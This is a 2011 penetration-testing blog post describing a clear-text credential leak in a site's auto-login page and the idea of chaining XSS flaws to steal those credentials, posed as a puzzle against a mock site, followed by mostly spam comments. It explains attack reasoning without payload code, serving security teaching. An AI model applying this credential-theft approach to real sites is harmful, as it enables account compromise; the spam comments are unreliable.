Monday, February 7, 2011

Tricky exploit - a penetration test puzzle

In a recent application security audit for a web-site I came across a big, blaring breach.
while it's always fun to find a good vulnerability, it turned out to be quite tricky to actually exploit it. The trickiness was not due to good security practices but to pure (un)luck (depending on whose point of view). It seemed every angle I tried was off by just a tiny bit.

Eventually I managed to find an interesting multiphase exploit vector, and I think it makes for some interesting tinkering/reading.  I've created a mock-up replica of the vulnerable web-site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wit against the mock-site and find it yourself, before reading on to the detailed exploit write-up.

The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After login to the client site, the user was shown a menu that contained a link to the printing system. In order to facilitate the user, the link to the printing system from the menu would try to use the previously given credentials from the client login and pass them on to the printing system for authentication. A poor man's SSO so to speak.

The Breach
It turned out that this "facilitating" method would pull the user credentials and post them to the printing system unencrypted via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If successful, a menu is presented (menu.php).
A click on the "Go to Printing" link directs the browser to an intermediate page (printAutoLogin.php) that contained the user credentials in a pre-filled form that is immediately  auto-submitted to the printing system login page (printSystem.php) which checks them for validity.

 Click image to enlarge

Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.

The breach is crucial and apparent: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to the attacker. The only question remaining is, how can he get it??

Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack exploiting it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that gets his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends in place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user credentials. One way to do this would be to obtain the session cookie and use it to access the tell-tale URL impersonating the legitimate user and obtaining his credentials (assuming no IP checks are done). The cookie was set http-only which made this vector harder.

Another option was to get the credentials on the client side (using an xmlhttprequest) and have them sent directly. This would overcome the http-only problem, and would also be much cooler...

In practice XSS flaws were abundant. I found several around the site, but they were all just a bit off. Two were in different sub-domains, so they didn't have the session cookie set, and were prohibited from making cross-(sub)-domain xmlhttp calls. Another XSS was actually in the same sub-domain but used HTTP whereas the rest of the site was in HTTPS, so again no cookie (it was secure) and no cross-protocol calls.

Close but no cigar. Yet.

Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts into a simplified mock-website that you can play around with.

The website home page is:
Valid user credentials are : Name:user123 Password:pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I didn't describe yet to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).

Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.

The detailed exploitation is provided in a separate blog entry.


  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

  2. Awesome! Congratulations!

  3. Yes, How attacker creates "XSS PAYLOAD 2" is not so clear & it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.

  4. Wholesale Sexy Lingerie,High Quality!Low Price! Wholesale Leggings,Plus Size Corsets,Wholesale Halloween Costumes From China Suppliers LingeriePark.Wholesale Only,No Retail!Lingerie China Suppliers
    Wholesale Sexy Lingerie
    Low Price Lingerie
    Lingerie China

  5. I am really enjoying reading your well written articles.
    I think you spend numerous effort and time updating your site. I have bookmarked it and I am taking a look ahead to reading new articles.

  6. Thank you for sharing such a informative post with us, it will beneficial for everyone, It is one of the best sites that I have visited. I am looking forward to read more blogs post from here
    Assignment Help UAE

  7. Thank you for sharing valuable information. Nice post. I enjoyed reading this post. Child Homeopathy Doctor in Jaipur

  8. This is a really super post. Must admit that you are amid the best writer I have read. I appreciate your making the effort to discuss this class of article. Best Homeopathy Doctor in Jaipur

  9. Union advances are conceivable choices to contracting regularly scheduled installments and still assume liability for the obligation.Payday Loans San-diego

  10. In any case, you should know about what you are consenting to and design the reimbursement date so you don't get yourself assist behind.Cash Advance

  11. Thank you for taking the time and sharing this information with us. It was indeed very helpful and insightful while being straight forward and to the point.
    world no 1 assignment help company

  12. Bookmarked your fantastic website. Fabulous work, unique way with words! For more info: Dubai Film Production Companies Corporate Video Production Dubai

  13. It is obligatory, by and large, for the borrower to have a financial records with coordinate store of their paycheck as that is the manner by which the moneylender gets credit installments from the borrower.
    Payday Loans San-diego

    Cash Advance Chicago
    Auto Title Loans Chicago
    Cash AdvancePayday Loans

  14. This most recent pattern offers enormous accommodation to the clients. Check getting the money for machines are an other option to the conventional method for benefit in that they can be found in an assortment of areas and can be utilized specifically by the clients themselves with no help. check cashing san diego

  15. This consistently expanding development is on account of conventional bank credits are not taking care of the requests of entrepreneurs. Cash Advances Chicago

  16. Very interesting blog. Lot of blogs I see these days don’t really provide anything that I’m interested in, but I’m most definitely interested in this one. Thanks a lot for this share!! best essay writing service

  17. Programming Assignment help
    If you are still in a dilemma, you could ask your teacher for some guidance, or you can take Assignment helpfrom different assignment writing service providers. There you can find many online experts, who are all set to help you in your assignment. The proper outline followed by them will give you an idea of how to make your assignment look more presentable and attractive.